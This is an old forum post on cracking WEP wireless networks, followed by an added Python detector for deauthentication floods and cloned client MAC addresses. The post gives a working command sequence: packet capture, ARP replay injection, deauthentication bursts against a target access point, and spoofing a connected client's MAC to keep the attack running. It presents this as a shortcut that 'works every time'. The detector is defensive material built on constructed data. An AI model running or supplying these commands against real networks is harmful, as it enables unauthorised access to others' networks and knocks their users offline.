WEP SKA Shortcut and Handling Open System Aireplay-ng -3 deauth/disassociation



mmusket33
2014-03-17, 02:46
We are running into WEP SKA more and more. Aircrack-ng has a long, involved procedure for SKA. Before you use this procedure, try this shortcut.
Start airodump-ng
airodump-ng -c 1 --bssid TA:RG:ET:MA:CO:DE -w filename mon0
Start aireplay-ng -3
aireplay-ng -3 -x 150 -b TA:RG:ET:MA:CO:DE mon0
Send a few deauth bursts
aireplay-ng -0 10 -a TA:RG:ET:MA:CO:DE mon0

Look to see if a client exists in the airodump-ng window.

If a client is present but you get low IV production and occasional to constant deauth/disassociation warnings in your aireplay-ng -3 window, try this:

Stop all processes listed above.

Change the mac of mon0 to that of the client present even if the client is sitting idle.
ifconfig mon0 down
macchanger -m CL:IE:NT:MA:CO:DE mon0
ifconfig mon0 up

Restart airodump-ng again
airodump-ng -c 1 --bssid TA:RG:ET:MA:CO:DE -w filename mon0

Restart aireplay-ng -3
aireplay-ng -3 -x 150 -b TA:RG:ET:MA:CO:DE mon0

Send a few more deauth bursts
aireplay-ng -0 10 -a TA:RG:ET:MA:CO:DE mon0

Usually IV production just takes off. If this does not work, then wait for a different client or try the aircrack-ng approach.

Furthermore, in WEP open systems, if you run up your IVs to around 500 and then start getting deauth/disassociation warnings in the aireplay-ng -3 attack window, use the same technique of spoofing the MAC of the client and restart the attack. For us it works every time.

MTA
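
Added example, not part of the original post: what the deauth bursts and the cloned client MAC described above look like from the monitoring side, as a small Python detector run over constructed frame summaries. The MAC addresses, timings, sequence numbers and thresholds are all assumptions chosen for illustration.

```python
from collections import defaultdict

AP, CLIENT = "02:00:00:00:00:01", "02:00:00:00:00:02"  # constructed MACs

def build_sample():
    """Constructed frame summaries: (time_s, type, src, dst, 802.11 sequence number)."""
    frames = [(float(i), "data", CLIENT, AP, 100 + i) for i in range(5)]
    # Burst of deauth frames carrying the AP's address as sender.
    frames += [(5.0 + i * 0.005, "deauth", AP, CLIENT, 2000 + i) for i in range(64)]
    # A second radio reusing the client's MAC: its counter (~3000) interleaves
    # with the real client's counter (~105).
    for i in range(6):
        frames.append((6.0 + i * 0.1, "data", CLIENT, AP, 3000 + i))
        frames.append((6.05 + i * 0.1, "data", CLIENT, AP, 105 + i))
    return sorted(frames)

def deauth_bursts(frames, window=1.0, threshold=30):
    """Return {(src, dst): peak} where deauth frames per sliding window reach threshold."""
    times = defaultdict(list)
    for t, kind, src, dst, _ in frames:
        if kind == "deauth":
            times[(src, dst)].append(t)
    alerts = {}
    for pair, ts in times.items():
        start = peak = 0
        for end in range(len(ts)):
            while ts[end] - ts[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[pair] = peak
    return alerts

def shared_mac_suspects(frames, max_gap=64, min_jumps=3):
    """Return {src: jumps} for MACs whose 12-bit sequence counter keeps jumping,
    which is what two transmitters sharing one address produce."""
    last, jumps = {}, defaultdict(int)
    for _, _, src, _, seq in frames:
        if src in last and (seq - last[src]) % 4096 > max_gap:
            jumps[src] += 1
        last[src] = seq
    return {mac: n for mac, n in jumps.items() if n >= min_jumps}

if __name__ == "__main__":
    sample = build_sample()
    print("deauth bursts:", deauth_bursts(sample))
    print("shared-MAC suspects:", shared_mac_suspects(sample))
```

On a real network the tuples would come from a monitor-mode capture, and the thresholds need tuning against normal roaming and retransmission behaviour.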